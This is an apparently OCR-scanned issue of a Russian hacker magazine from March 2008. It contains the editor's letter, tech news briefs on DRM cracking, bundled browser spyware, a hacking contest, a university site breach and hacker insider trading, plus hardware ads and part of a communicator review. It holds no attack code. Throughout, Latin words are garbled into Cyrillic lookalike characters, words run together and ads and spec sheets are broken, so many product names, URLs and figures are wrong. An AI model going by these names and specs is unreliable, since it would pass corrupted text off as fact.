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В северное полушарие пришла весна. Помимо приближающегося тепла и вылезшей из-под снега 
грязи для нас это означает, что совсем скоро в Дубае будет проходить Наск Іп ТЬе Вох 2008 и если 
ничего не обломается, мы со Степом туда отправимся, чтобы оперативно рассказывать тебе обо 
всем интересном, что услышим иувидим наэтой крутой хакерской конференции. А послушатьтам 
будет кого. Взять хотя бы одного из главных спикеров - Брюса Шнайера. Настоящий дядя-леген- 
да, гений криптографии! В общем, мы будем держать тебя в курсе всех новостей и обязательно 
сделаем в журнале несколько тизі геасі статей по материалам конференции. 

А вообще, если у тебя будет желание и возможность смотаться в ОАЭ в апреле, то скорей беги на 
ѵѵѵѵѵѵ.ЫіЬ.огд и регистрируйся на мероприятие. Потусим на конференции вместе :). 

Р.5. Я завел себе жж, так что не забудь зафрендить исіаіііе. 



пікііогг, главный редактор X 

исіаІІІе.Ііѵе]оигпа1.сот 

\ллллѵ.29Ь.ги 
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Обо всем за последний месяц 




Добавим черного 

Компания І_Ѳ представила новые широкоформатные мони- 
торы из линейки ЫоЫе Віаск, отличительной чертой которых 
является контрастность 10000:1 . Это самый высокий показа- 
тель в мире. В мониторах используется технология компании 
І_6 под названием Оідііаі Ріпе СопІгаБІ; (ОРС). Суть технологи и 
заключается в том, что уровень яркости динамически контро- 
лируется в зависимости от изображения на экране. Качество 
картинки это позволяет получить не хуже, чем у дорогих 
телевизоров. Помимо контрастности, мониторы обладают 
временем отклика в 2мс, что пригодится любителям дина- 
мичныхигр. Влинейке представлены две модели — І_197\Л/Н с 
диагональю 19дюймов, ориентированная на бизнес-пользо- 
вателей, и І_227ѴѴТ с диагональю 22 дюйма, которая придется 
по нраву геймерам. Стоимость І_227ѴѴТ составит порядка 1 1 000 
рублей, а цена на І_1 97ѴѴН пока не объявлена. 



, пользователи поисковика 



Согласно исследованиям компании Нііѵѵізе, 
боо^іе богаче пользователей 'ѴіаІІОО и тратят больше денег в онлайн-магазинах. 



РІіузХ как патч 



РЬузХ 

адеіа 



После приобретения компании Адеіа компанией ЫѴЮІАвсе гадали, как 
же ГѵІѴЮІА воспользуется полученными правами на РЬувХ и каким образом 
будет реализована поддержка физического движка. И вот генеральный 
директор ІЧѴЮІАДжен-Хсун Хонгреп-Нэип Ниапд) заявил, что сейчас 
полным ходом идет портирование физического движка на СІЮА (Сотрите 
ІІпібесІ Оеѵісе АгсЫіесІиге) и что поддержка будет реализована в виде 
обычного софтверного апдейта. Таким образом, все владельцы карт 
ІЧѴЮІА, поддерживающих СІЮА (а пока это только карты с 6РІІ восьмой 
серии), в скором времени получат патч, который позволит насладиться 
новыми физическими эффектами. О точных сроках выхода апдейта ничего 
неизвестно, но затягивать с ним компания не собирается, поскольку апдейт 
позволитувеличить продажи новых плат. Поддержка физического движка 
будет стимулом к покупке как для владельцев более старых плат, таки для 
обладателей последних карточек, которые, возможно, захотят приобрести 
еще одну, чтобы разделить между ними расчет графики и физики. 
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□вдіЬпІіір^ 

ОідііаПТе представляет новую 
производительную платформу 





Работа с ООРЗ & ООР2 



Функция ОиаІ ОідііаІ А и сП о 
РСІе Сеп2.0* (* только хзба) 





Х38А 




о Зиррогіз ІпіеІ® Соге™2 Оиасі апсі Соге™2 Оио ргосеззогз 
о ОиаІ ОЭРЗ ІЗЗЗМНг, 4СВ Мах. ог 00К2 ІО66МН2, 8ѲВ Мах. сотЬо тетогу 
о 3* РСІе хіб ѵѵіііі АТІ® СгоззРіге™ зиррогі 
о РиаІ ОідііаІ Аисііо тиііі-зігеатіпд 
о 100% ЗОІ_Ю Сарасііог апсі Реггііе СЬоке сіезідп 
о СооІ Ріре сооііпд зузіет 
о Рохсопп ОідііаІ Соппесіог 



Р35АР-5 




о Зиррогіз ІпіеІ® Соге™2 Оиасі апсі Соге™2 Эио ргосеззогз 
о ОиаІ ОЭРЗ 1333(ос)МН2, 40В Мах. ог Э0Р2 1066 МН2, 8ѲВ Мах. сотЬо тетогу 
о 2* РСІе хіб ѵѵііРі АТІ® СгоззРіге™ зиррогі . ** г -®! 1 ■*' 1 

о ОиаІ ОідііаІ Аисііо тиііі-зігеатіпд 

о 100% 501-Ю Сарасііог апсі Реггііе СНоке сіезідп |] | [^| , 

И і ішУ 



о Рохсопп ОідііаІ Соппесіог 



ОеВІТ 

НАМОѴЕВ, СЕКМАГІѴ 

4-9 МАВСН 2008 

РОХСОПП 

Зее из а!С21, НаІІ 21 




Материнские платы ОідііаІ Ьііе 
сочетают в себе высокую 
производительность и богатые 
возможности для цифровых 
развлечений 



Дилеры: 

Москва: 

РгоіСот - (495)730-5603; БіагіМазіег - (495)783-4242; ІЛІга ЕІесігопісз - (495)790-7535; Арбайт компьютерз - (495)725-8008; АРКИС - (495)980-5407; Белый ветер ЦИФРОВОЙ - (494)730-3030; 
Инлайн - (495)941-6161; КИБЕРТРОНИКА - (495)504-2531; Лайт Коммуникейшн - (495)956-4951; НЕОТОРГ - сеть компьютерных магазинов - (495)223-2323; Сетевая Лаборатория - (495)500-0305; 
Форум-Центр - (495)775-775-9; Альметьевск: Компьютерный мир - (8553)256-934; 

Барнаул: К-Трейд - (3852)66-6910; Воронеж: Рет - (4732)77-9339; Екатеринбург: Брасе - (343)371-6568; Трилайн - (343)378-7070; Ижевск: Корпорация Центр - (3412)438-805; 

Курск: ФИТ (ТСК 2000) - (4712)512-501; Новосибирск: НЭТА - (3832)304-1010; Пермь: Инстар Технолоджи - (342)212-4646; Пятигорск: Дивиком - (8793)33-0101; 

Ростов-на-Дону: Форте - (863)267-6810; Самара: Аксус - (846)270-5960. 
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Взломана 
защита іТипез 

Музыка, распространяемая через іТипез Эіоге, поставляется 
с защитой йРМ. Этот формат позволяет проигрывать треки 
только на устройствах от Арріе. Вокруг ОРМ возникает много 
споров, и одно время Стив Джобс активно вел переговоры с 
музыкальными компаниями, чтобы отказаться от этого способа 
защиты данных. Переговоры так ни кчему и не привели. Но 
недавно известный хакер Йон Лех Йохансен представил 
программу, которая позволяет конвертировать защищенную 
музыку в другие форматы. Это дает возможность прослушивать 
купленную музыку не только на устройствах Арріе. Программа 
получила название ОоиЫеТѵѵізІ и обладает социальной функ- 
цией, с помощью которой через сеть Интернет можно синхро- 
низировать треки со своими друзьями. Программа способна 
переконвертировать порядка сотни песен за полчаса с потерей 
качества примерно 5%. Создатели программы подчеркивают, 
что она предназначена только для прослушивания законно 
купленной музыки, а не для ее нелегального распространения. 
Нуда, конечно... 



Американские ученые создали самые точные часы в мире — с точностью до секунды они 

проходят 200 миллионов лет 



В55- газета 

Читать Р55-ленты не всегда удобно — все- 
таки электронный форматсообщений не 
способствует идеальному восприятию тек- 
ста. Хорошо было бы собрать все любимые 
Н55-ленты и сделать из них бумажную газе- 
ту, сидеть утром на кухне и читать за чашеч- 
кой кофе. Теперь эту мечту можно осущест- 
вить — достаточно воспользоваться новым 
сервисом Реесиоигпаі.сот. Он соберетвсе 
новости из отобранных лент и сделает из 
них рсіі-файлы, готовые к печати. Выглядеть 
при этом они будут как настоящая газета. 
Можно указать число колонок и будут ли 
присутствовать в тексте изображения. Так- 
же для веб-мастеров будет интересен спе- 
циальный виджет, который автоматически 
генерирует страницы из новостей сайта и 
предлагает их посетителям для скачивания. 
Хотя современныетехнологии необратимо 
пришли в нашу жизнь, читать с листа до сих 
пор гораздо удобнее, чем с монитора. 
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Передай музыку, передай настроение 



Предстань... возможность обмениваться музыкой, видеороликами, а также 
фото и текстовыми файлами - настоящий источник отличного настроения 
для тебя и ’воих друзей! Теперь обмен будет происходить в 3 раза быстрее 
обычного, благодаря ВІиеТооНі версии 2.0. Новый Затзипд ІИ0І60 
Без проводов, без ограничений -отличное настроение передается мгновенно! 



Видео МРЕ64 $ ВІие(оо(ІГ2.0 



лішаима^ 



^ тедапеѵг 



Заразный браузер 

Существует большое количество бесплатных браузеров 
— известные всем Рігеіох и Орега, а также несколько обо- 
зревателей, использующих движок Іпіегпеі Ехріогег. Одним 
из таких является и РбазеОиС Он предлагает довольно 
пестрый интерфейс, поддержку скинов, блокировку всплы- 
вающих окон и т.д. Как выяснилось, кроме всего перечис- 
ленного, в браузер любезно встроена небольшая вредонос- 
ная программка ЫаѵЕхсеІ, которая собирает информацию 
о посещенных сайтах и отсылает производителям. А ведь, 
казалось бы, на сайте РбазеОіЛ недвусмысленно написано: 
«N0 5РѴѴѴАРЕ - N0 АйѴѴАРЕ - ТРАЫ5РАРЕІ\1Т 5ЕТІІР»! 
Теперь, когда наличие вредоносных модулей в браузере 
получило публичную огласку, одной такой надписью уже не 
обойтись. О массовой эпидемии среди пользователей гово- 
рить не стоит, поскольку, хотя РЬазеОіЛ и считается удачной 
надстройкой над виндусовым Эксплорером, пользуется 
этим бесплатным браузером не так много народу. 




эильных телефонов в мире в этом году превью 
50% населения Земли и достигнет 3,3 миллиарда человек. 
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Интернет на 220В 

Наверняка ты слышал отехнологии передачи сигналов через 
домашнюю электропроводку. Отнынеутебя есть возможность 
организовать подобную сетьу себя в квартире — компания 
2уХЕІ_ Соттипісабопв начинает продажу на территории России 
продуктовой линейки НотеРІид АѴ, в которой представлен 
целый ряд устройств: от обычных адаптеров до целых интернет- 
центров. В устройствах использованы чипы компании I пЕеІІоп. 
Скорость передачи данных достигает 200 Мбит/с, но в реальном 
помещении стабильная скорость будет порядка 40-80 Мбит/с 
из-за помех, которые создают другие электрические приборы. 
Технология особенно интересна в тех случаях, когда нет возмож- 
ности развернуть сеть ѴѴі-Рі или когда необходимо передавать 
большие объемы информации с большой скоростью, например, 
при передаче потока видео в РЮ-качестве. Самым простым адап- 
тером является РІ_А400 — в нем присутствует только порт ЕіЬегпе* 
и кабель питания. Для передачи сигнала необходимо включить в 
другом конце квартиры такой же адаптер. «Коллеги» сразу обна- 
ружат друг друга и будут работать какудлинитель Еібегпеі: через 
домашнюю проводку. Стоимость комплекта из двух адаптеров 
составляет 5233 рубля. 
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Потуши изжогу! 
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Конкурс взлома 

В Ванкувере 26-28 марта пройдет конференция по безопасности СапЭесѴѴезІ: 
Ѵапсоиѵег 2008, в ходе которой будет проведен конкурс по взлому. По ходу 
конкурса предстоит выяснить, какая операционка надежнее — Винды, 

Линуха или МакОсь. Суть мероприятия проста — необходимо получить доступ 
к компьютеру, на котором установлена одна из участвующих в конкурсе 
операционок. Соревнование проводится не только на факт взлома, но и на 
скорость. Организатор конкурса Драгое Рю Югадов Риіи] полагает, что пуб- 
личный взлом системы можетсказать о ее защищенности намного больше, 
чем сухая статистика. Результатом соревнования будет, конечно, не прекра- 
щение споров, какая система надежнее, но выявление основных недостатков 
и особенностей. Чтобы у специалистов по безопасности, присутствующих на 
конференции, появился достойный повод разорвать сразутри оси одновре- 
менно, создатели приготовили награды, среди которых несколько дорогих 
ноутбуков. «Мы хотим, чтобы призы вызвали у хакеров страстное желание 
победить. Это должно быть что-то очень привлекательное», — отметил 
Драгое Рю. 



6 % 



юзеров генерируют 



50 % 



переходов по рекламе. 



Роботы тоже л ю ди 



Американский изобретатель Рэй Карзвейл, член комиссии Национальной 
технической академии США по влиянию искусственного интеллекта на 
развитие человечества, утверждает, что к 2029 году искусственный интел- 
лект достигнетуровня человеческого мозга. В данный моментчеловечес- 
тво стоит на пороге вживления в человеческий организм нанороботов, 
которые будутулучшать интеллект и физические способности, в результате 
чего люди и роботы станут единым целым. Также изобретатель подчерк- 



нул, что это не будет чем-то сверхъестественным, поскольку «мы уже яв- 
ляемся цивилизацией «человекомашин», мы уже используем технологии 
для расширения наших интеллектуальных и физических способностей». 
Возможно, все это приведет к разногласиям в обществе, поскольку будет 
явное различие между богатыми людьми, имеющими возможность напич- 
кать себя большим количеством апгрейдов, и бедными, которым останется 
только роль обслуги. Так что копим деньги на нанороботов... 
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Продвинутый 

мультитач 

Компания Арріе подала очередной патент, в котором описывается дальней- 
шее развитиетехнологии«тиШ-1юисЬ» на ноутбуках МасЬоокАіги мобиль- 
ных устройствах іРбопе и іРобТоисб. В патенте описывается, каким образом 
при помощи большого и двух других пальцев можно будет производить 
команды «копировать», «вставить», «выделить все» и «отменить». Кстати, 
владельцы іРЬопе давно недовольны отсутствием возможности копирования 
текста хоть каким-нибудь способом. Кроме того, существует набор действий, 
которые будут доступны только для ноутбуков — это работа с файлами, выпол- 
нение различных функций Мае 05 типа Ехрозе, оперирования веб-браузе- 
ром ит.п. Порой придется использовать все пять пальцев. Также существует 
возможность боковой стороной мизинца управлять уровнем громкости, 
яркостью монитора, включением спящего режима ит.п. Все эти прелести 
будут доступны в качестве обновления ПО, но смогут работать только с чипом 
Вгоабсогп. Владельцам МасЬоок и МасЬоок Рго счастья не светит. 




100 млрд бес: 
Бкуре за четыре с по 
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Ловушка для шпиона 

Если твой почтовый ящик взломан, ты можешь и не догадываться, что 
кто-то втихаря читаеттвою личную переписку. Конечно, почтовый сервер 
может вести статистику ІР-адресов, с которых проверялась почта, но это 
тоже не панацея. Редакторы сайта такеизеоЕсот предложили интерес- 
ный способ использования счетчика для проверки факта чтения твоей 
почты посторонними. Для установки ловушки надо зарегистрироваться на 
сайте ѵѵѵѵѵѵ.опезіаібгее.согп и скачать оттуда скрипт счетчика 0пе5{аі5сгірЕ 
М. В него надо вбить свой регистрационный номер, изменить формат на 
Ыті и сделать вложением письма. Теперь осталось с интригой оформить 
сообщение, чтобы злоумышленнику обязательно захотелось его прочитать, 
и отправить себе же на адрес. Если кто-то откроет мыло, то сервер ОпеЗіаІ: 
зафиксирует этот фа кт и добавит в свою статистику. В статистике хранится 
много интересной информации, включая ІР-адрес. Остается только приду- 
мать месть послаще. 
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Новая мама 



Компания Іпіеі представила новое поколение материнских 
плат для настольных компьютеров. Главным достоинством 
этих материнок, получивших название ЗкиІІТгаіІ, является 
возможность установки сразудвух процессоров. Раньше мно- 
гопроцессорные платы использовались либо в серверах, либо 
в мощных станциях для обработки графики или инженерных 
задач. Сейчас Компания Іпіеі предлагает использовать два 
процессора для построения мощных геймерских компов. По- 
мимо двух процов в материнку можно установить сразу четыре 
видеокарты. Финальная стоимость компьютера, полностью на- 
шпигованного процами и видяхами, достигает порядка $6000. 
Помимо цены, спорным моментом можно счесть неумение 
современных игр работать с более чем одним процессором. Но 
в компании Іпіеіуверяют, что к концу 2008 года такие прило- 
жения появятся. Пока же первыми покупателями видятся все 
те же инженеры, фотографы и любители видеомонтажа. В 
процессе разработки платы I пГеІ, чтобы обеспечить возмож- 
ность использования видеокарт отАТІ, сотрудничала со своим 
прямым конкурентом АМР. 



По данным Лаборатории Касперского, в 



2007 язей 



появилось 
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Одежда - 
подзарядка 

В скором времени планируется создание оде- 
жды, которая будет вырабатывать энергию за 
счетсгибания. Ученые из университета штата 
Джорджия создали нановолокна из оксида 
цинка, которые в 1 000 разтоньше волоса. 
Помимо «обычных» волокон применяются 
электроды, покрытые золотом. Вместе они 
создают пару и, когда сгибаются, происходит 
преобразование механической энергии в 
электрическую. Одного квадратного метра 
ткани, прошитой нановолокнами, хватит 
для питания трЗ-плеера. Главный минус 
этого метода — при намокании оксид цинка 
разрушается. Стирку или дождь ткань пока 
пережить не способна. Для решения проблемы 
ученые разрабатывают специальное покрытие, 
которое будет защищать волокна от влаги. 

Итак, одежда будущего способна заставить 
тебя бегать на месте или размахивать руками, 
когда в твоем мобильнике садится батарейка. 
Кроме возможности сэкономить электроэнер- 
гию, ты получишь интересный способ следить 
за фигурой. 
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Халява отбоодіе 

Компания боодіе собирается выйти на китайский рыноконлайновой му- 
зыки с интересным предложением — совместно с музыкальным порталом 
Тор 1 00. сп планируется раздавать лицензионные гпрЗ нахаляву. Предпола- 
гается, что толпы безумных китайцев, услышав слово «бесплатно», резко 
ломанутся за музыкой и сметут все баннеры, которые будут развешены на 
портале. Прибыль с баннеров должна покрыть все расходы за раздачу му- 
зыки. Помимо Гугла, который какпоисковая система занимает четверть рынка, 
на китайских просторах очень популярен местный поисковик Ваісіи.сот 
(60% рынка). Этот Байду тоже занимается музыкальным бизнесом, но 
недавно несколько очень крупных музыкальных лейблов подали на него 
в суд из-за возможности поиска по трЗ-сайтам, в числе которых много 
пиратских. Такие напряженные отношения музыкальных компаний с 
конкурентом дают боодіе отличную почву для выхода на рынок, тем более с 
желанием раздавать музыку даром. 
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Война окончена 



Компания ТозЫЬа официально объявила о прекращении дальнейшей 
разработки формата ГЮ-ОѴО. Естественно, плееры и носители тоже 
отправились в мусорное ведро. К концу марта этого года производство и 
продажа всего, связанного с этим форматом, будут прекращены. Однако 
поддержка пользователей, успевших прикупить плееры к вымершему 
формату, продолжится. Также не будет остановлена работа с партнерами, 
заинтересованными в формате. Теперь можно уверенно сказать, что 
войну форматов выиграла компания 5опу с технологией Віи-гау. Испол- 
нительный директор ТозЫЬа Ацутоши Нишида заявил, что разработку 
ГЮ-ОѴО решили прервать в связи с изменениями на рынке, но сам он 
продолжает верить в светлое будущее видео высокой четкости. Что ж, 
теперь всем желающим иметь дома проигрыватель ГЮ-фильмов не при- 
дется мучиться выбором между двумя похожими форматами. В интернете 
уже появилось много шуток на тему того, что можно делать с ненужными 
теперь НО-ОѴО плеерами. Например, предлагается продолжать исполь- 
зовать их для проигрывания обычных ОѴО. 





Раскрывая форматы 

Місгозоіі наконец раскрыла спецификации двоичных форматов ѴѴогсІ, Ехсеі 
и РоѵѵегРоіпІ. Это было сделано в рамках программы Ореп Эресібсаііоп 
Рготізе. Открыты форматы для всех последних версий ОЫсе, начиная 
с ОЫсе 97. Отметим, что в последней версии использован формат ОЫсе 
Ореп ХМІ_, который не является двоичным, но его спецификации были 
раскрыты еще в 2006 году в рамкахтой же программы. Открытие форматов 
способствует развитию программ, которые так или иначе взаимодействуют 
с документами ОЫсе. Также должна улучшиться поддержка этих форматов 
в конкурирующих пакетах ОрепОЫсе.огд и I В М ЭутрЬопу. Открытие спе- 
цификаций было одним из требований для принятия ОрепХМБв качестве 



Шситісё 



стандарта 150. Теперь разработчикам, желающим работать с этими форма- 
тами, не придется заключать соглашение с Микрософт и даже информи- 
ровать об их использовании. Отсутствие нормальной поддержки форматов 
Місгозоіі ОГГісе останавливает многих от перехода на платформы, отличные 
отѴѴіпсіоѵѵз. В скором времени эта преграда будет устранена. 



ХАКЕР 03 /111/ 08 



► Оіз 








гпедапе\ѵ5 



Робот- 

сновидец 

Интересный проект реализовали двое американцев — ху- 
дожник Фернандо Ореллана и специалист по робототехнике 
Брендан Бёрнс. Робот-андроид может воспроизводить сон 
человека в маленьких сценках, даже если сам человек ничего 
не помнит. Во время сна специальными датчиками с человека 
считываются данные, на основании которых можно предпо- 
ложить о тех действиях, которые им совершаются во сне. Эти 
действия и будут повторяться роботом. После просмотра серии 
таких сценок можно примерно восстановить некоторые детали 
сна. Проектполучил название Біеер ѴѴакіпд и носитисключи- 
тельно развлекательный характер. Но интерпретация показа- 
ний датчиков не настолько вольная, чтобы можно было сказать 
о полном несоответствии действий робота и человека во сне. 
Возможно, в дальнейшем появятся технологии, которые будут 
способны болееточно воссоздавать сновидения. 




РапсІаЬаЪз: в 2007 
выросло на 463% 




ЯНОВ 




Россия 
в черном 
списке 



Международный альянс владельцев интеллек- 
туальной собственности (I I РА) внес Россию в 
черный список стран, не соблюдающих автор- 
ские права американских компаний. В списках 
ИРА Россия присутствовала с 2001 года, а в 
2005 и в 2006 годах ситуация с авторскими 
правами была признана «плохой, стенден- 
цией кухудшению». В черном списке, помимо 
России, находятся такие страны, как Китай, 
Украина, Индия, Чили, Венесуэла, Таиланд, 
Мексика, Израиль, Саудовская Аравия, Канада 
и другие. Российскими пиратами за 2007 год 
был нанесен убыток в размере 1 ,43 миллиарда 
долларов. В целом, по оценке ИРА, амери- 
канские правообладатели ежегодно теряют 
от мирового интеллектуального пиратства 
30-35 миллиардов долларов. Нахождение в 
черном списке может затормозить вступление 
России во Всемирную торговую организацию. 
ИРА порекомендовал министерству торговли 
США включить РФ, наряду с еще 1 2 государ- 
ствами, в правительственный список главных 
нарушителей авторских прав на программное 
обеспечение, фильмы и музыку производства 
Соединенных Штатов. 



► 014 
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У Гарварда 
фиговые админы 

Сайт гарвардской аспирантуры естественнонаучных и гуманитарных фа- 
культетов был нагло похачен, и весь архив сайта был выложен на всеобщее 
обозрение пользователей треккера ТЬе Рігаіе Вау. Віір-архиве весом 125 
метров содержалисьтри базы, в одной из которых хранились различные 
контакты, вторая была базой публикаций, а в третьей, как описал взлом- 
щик, «всякие мелочи». В архиве также лежала записка отхакера, в которой 
на кривом английском содержалась секретная информация, что админ 
сервера под ником ІдаКоптуп и некомпетентен. Рядышком были заботливо 
указаны логины и пароли администраторов. Вероятно, ІдаНоп — это сис- 
темный администратор и специалист службы поддержки Гарварда ТЬотаз 
ѲаНоп, который пока никак не прокомментировал сей наглый взлом. 
Возможно, здесьзамешаны и личные отношения взломщика с админом, но 
эта версия не очень согласуется с тем фактом, что английский хакер знает 
весьма посредственно. 




Удачливый хакер 



Хитрый украинский взломщик Александр Дорожко похакал сервакфар- 
мацевтической компании ІМ5 НеаШт Проникнув на закрытую часть сайта, 
он завладел финансовым отчетом компании за несколько часов до его 
официальной публикации. Оценив отчетик, Александр пришел к выводу, 
что делау компании идутфигово и после официальной публикации акции 
резко пойдут вниз. Выложив из своего кармана 41 671 баксов, хакер открыл 
опцион на продажу акций, который должен был истечь втечениетрех дней, 
если бы акции неупали. Но после публикации отчета инвесторы компании 



остались недовольны, и акции полетели вниз, а Александр наторговал 295 
456 долларов. Сей опцион сразубыл зарегистрирован программой Комис- 
сии по ценным бумагам и биржам как подозрительный, и средства сделки 
были заморожены. Но по закону операция считается недействительной в 
случае сговора с менеджерами компании, а поскольку сговора кактакового 
не было, то счета пришлось разморозить. Дело по факту взлома также 
возбуждать не стали, потому что процесс с Украиной — это нудное и беспер- 
спективное дело. 
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КОМПЬЮТЕР» 

ВКАРМАНЁ^И 



Появление коммуникаторов на несколько порядков расширило представления 
о функциональности и производительности устройств для общения. Совмес- 
тить КПК и телефон — действительно крутая идея! Специально для тебя мы 
отобрали популярные модели и провели тщательное исследование их возмож- 
ностей. 



г ТЕХНОЛОГИИ 

Давай разберемся с определениями смартфонаи коммуникатора. Слово 
«смартфон» образовано отанглийского зтаіі рбопе, что дословно перево- 
дится, как«умныйтелефон». Фактически, это тот же телефон, но сустанов- 
ленной операционной системой. Сейчас самая распространенная ОС для 
такого класса устройств — ЗутЬіап 05. Это удобная и массовая система. 

Она позволяетустанавливатьдополнительный софт, написание которого 
облегчено большим распространением системы. Ты можешь найти програм- 
мы с любыми функциями. Положительная сторона смартфонов втом, что 
это компактный компьютер в виде телефонной трубки. Но с этим связаны и 
недостатки: как правило, девайс не обладает сенсорным экраном, а значит, 
все управление осуществляется при помощи аппаратных кнопок. Общаться 
и набирать текст на цифровой клавиатуре одной рукой довольно удобно, но 
редактировать текст или выполнять сложные операции затруднительно. 
Перейдем к коммуникаторам. Этот симбиоз телефона и КПКтакже 
образовался в ходе технической эволюции — 65М модуль перенесли 
в корпус наладонника. Девайс может работать практически со всеми 
типами файлов (зависит отустановленного ПО) и воспроизводить аудио и 
видео-контент. Коммуникатор допускает работу с беспроводными сетями 
ВІиеІооіЬ и ѴѴі-Рі. Последнее качество особенно ценно ввиду распро- 




страненности этой технологии. Относительно большой сенсорный экран 
упрощает работу с файлами (осуществляется при помощи стилуса). 
Реализован удобный серфинг по просторам глобальной сети. Если ѴѴі-Рі 
отсутствует в зоне досягаемости, ты можешь подключиться к инету через 
сотовую сеть. Кроме того, твои карманы перестанут испытывать нагрузку 
двух гаджетов — теперь все устройства заключены в одном. Ріо в совме- 
щении устройств есть и минусы: при посадке аккумулятора ты лишаешься 
сразу и сотового телефона, и КПК. 

В МЕТОДИКА ТЕСТИРОВАНИЯ 

Производительность коммуникатора и смартфона зависит от процессора, 
установленного в нем, и от доступного объема памяти. Кто-то скажет, что 
флеш-карты позволяютзабыть об этой проблеме. Ріо вспомни, что любому 
компьютеру необходима оперативная память и уже от ее количества за- 
висит, какое количество программ ты сможешь запустить одновременно. 
Опыт показывает, что серфинг в интернете отнимает немало ресурсов 
КПК. Довольно часто приходится чистить временные файлы. 

Таким образом, для оценки производительности КПК мы использовали 
как синтетические бенчмарки изтестового пакета 8РЬ Вепсбтагк, так и 
собственные наблюдения. Тесты наглядно показали производительность 
в цифрах, иты сможешьувидеть разницу вычислительной мощности 
устройств. К сожалению, пакет работает только под управлением ОС 
ѴѴіпсІоѵѵз МоЬіІе и для теста смартфона непригоден. Для Ыокіа Е90 мы 
использовали другие популярные тестовые пакеты: ЛэепсЬтагк ѵі .1 .1 , 
ЛэепсЬтагк ѵ2 и ЛэепсЬтагк 30 ѵЗ .1.0. Тесты проводились как при 
использовании малого экрана, так и большого. Необходимым пунктом в 
измерениях стало время автономной работы с максимальной загрузкой. 
Также учитывались эргономические качества и эстетическая составляю- 
щая. 



ТЕ5Т_І_АВ ВЫРАЖАЕТ БЛАГОДАРНОСТЬ ЗА ПРЕДОСТАВЛЕННОЕ НАТЕСТИРОВАНИЕ ОБОРУДОВАНИЕ РОССИЙСКИМ ПРЕДСТАВИ- 
ТЕЛЬСТВАМ КОМПАНИЙ ЫОКІАр ІО, НТС И 6І_0РІІ5Н 



► оіб 
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ОЫізЬхбОО 



Технические характеристики: $630 

Процессор: Батзипд БС 32442 400 МГц 

ОС: МБѴѴіпсІоѵѵзМоЬіІеб.О 

Память РАМ : 64 Мб РАМ (доступно 47 Мб) 

Память РОМ: 128 Мб РІааІі РОМ 

Экран: диагональ 2 . 8 м , разрешение 240x320 (65536 цветов) 
Коммуникации: ѲР 5 , Е 06 Е, ѴѴі-Рі, 802.11 Ь/д, ВІиеіооіЬ 2 . 0 А 20 Р 
Питание: оті_і-іоп аккумулятора 1530 мАч, аккумулятор съемный 
Фотокамера: 1600x1200 (2 млн. пике.), встроенная вспышка, режим 
(ркросъемкй 

Слоты расширения: тісгоБРІТгапаРІааЬ) 

Дополнительно: радио 
Вес: 136 іі 

Размер : 58x1 07x1 4мм 



•••••••••О 

Компания біобвб поставляет на российский рынок немало интересных 
моделей коммуникаторов. Один из девайсов попал к нам в руки, и мы 
его тщательно осмотрели. Что приятно, устройство достаточно компак- 
тно и легко помещается в чехле-кобуре на поясе. Это стало возможным, 
благодаря продуманной эргономике и 2,8-дюймовому дисплею. Не все 
коммуникаторы крепятся так легко! Детали неплохо подогнаны и не скрипят 
при использовании. Темный корпус выполнен из нескользкого материала, 
так что выронить коммуникатор трудно даже при активном пользовании. 
Перейдем кэргономике. Помимо боковых кнопокесть целый набор клавиш 
на передней панели. На наш взгляд, производитель немного перестарался 
с количеством кнопок, а близкое их размещение может привести к случай- 
ному нажатию соседних. Пятипозиционный джойстикудобен, но несколько 
выступаетнад корпусом, так что, когда положишь девайс в карман, если не 
заблокируешь все действия, может произойти внеплановое управление. 
Что приятно, коммуникатор буквально напичкан различными адаптерами 
связи: 05М/Е06Е, ѴѴі-Рі, ВІиеІооіЬ 2.0 А2йР и даже 6Р5. Проще говоря, 
столько средств связи, что вряд ли ты останешься без контакта с цивилиза- 
цией. Если тебя забросит в безлюдную местность — сможешь сориентиро- 
ваться при помощи глобальной системы позиционирования СР5. Девайс 
оснащен процессором с частотой 400 МГц и оперативной памятью объемом 
64 Мб. При установке программ, а особенно программы навигации, 
рекомендуем воспользоваться флеш-картой, чтобы не загружать встроен- 
ный НавЬ. Съемный аккумулятор емкостью 1 530 мАч выдерживает работу 
втечение 5 часов 53 минут при просмотре видео, что является лучшим 
результатом в тесте. 




Технические характеристики: 

Процес сор : Батвііпд БС32442 500 МГц 

ОС: МБѴѴіпсіоѵѵзМоЬіІеб.о 

Память РАМ : 64 М б В АМ (доступно 47 Мб) 

Память РОМ : 256 Мб РІазЬ РОМ 

Экран: диагональ 2 . 8 ", разрешение 480x640 (65536 цветов) 
Коммуникации: 6 Р 5 , ЕР 6 Е , Н 5 РРА, УУі-Рі , 802.1 1 Ь/д, ВІиеІооіЬ 2.0 
Питание: от Ы-Іоп аккумулятора 1530 мАч, аккумулятор съемный 
Фотокамера: 1600x1200 (2 млн. пике.), встроенная вспышка, режим 
ЩакрорьейЩ 

Сл отЫ-ра сширения | тісгоБР (ТгапзРІазЬ) 

Дополнительно: радио 
Вес:14бг 

[Размер: 61x114x16 мм 



Старший экземпляр в линейке коммуникаторов отбіобзб — это бЫівЬ х800. 
По сравнению с Сіобвб хбОО, девайс имеетиное расположение кнопоки 
выполнен в черно-серебристыхтонах. Помимо боковых клавиш, имеются 
кнопки и на передней панели. Их расположениетаково, что пользовать- 
ся ими удобно только обладателям тонких пальцев — иначе, работая с 
девайсом одной рукой, очень легко нажать сразу на несколько кнопок. 
Вторым очевидным отличием от младшей модели является наличие двух 
камер, одна из которых находится на передней панели. Это подтверждает 
готовность аппарата к работе в сетях третьего поколения, где видеосвязь 
будет при меняться наравне с голосовым общением. Примечательно, что 
разработчики установили Ѵ6А матрицу с диагональю 2,8 дюйма. Четкость 
картинки заметно выросла, но во многих программах, неориентированных 
на такой экран, иконки очень маленькие. Надо упомянуть о процессоре и 
памяти: СРІІ работает на 100 МГц быстрее, чем в младшей модели — это за- 
метно при серфинге и просмотре картинок. Повышение частоты процессо- 
ра сказалось на времени работы — чуть больше 5 часов без подзарядки при 
полной загрузке. Объем встроенной собственной памяти увеличен до 256 
Мб, при этом пользователь может использовать карты формата тісгоЭй. 
Коммуникатор СІоГвЬ х800 нетолько совмещает функции наладонника и 
телефона, но и неплохо справляется с функцией навигатора. Даже без ус- 
тановки специального программного обеспечения ты можешь определить 
свои координаты, сориентироваться по сторонам света и отправить друзь- 
ям данные о своем местоположении при помощи СМС. Работать девайс мо- 
жет во всех беспроводных сетях. Поддержка ВІиеІюоіЬ 2.0 дает возможность 
пользоваться беспроводной стереогарнитурой для прослушивания музыки 
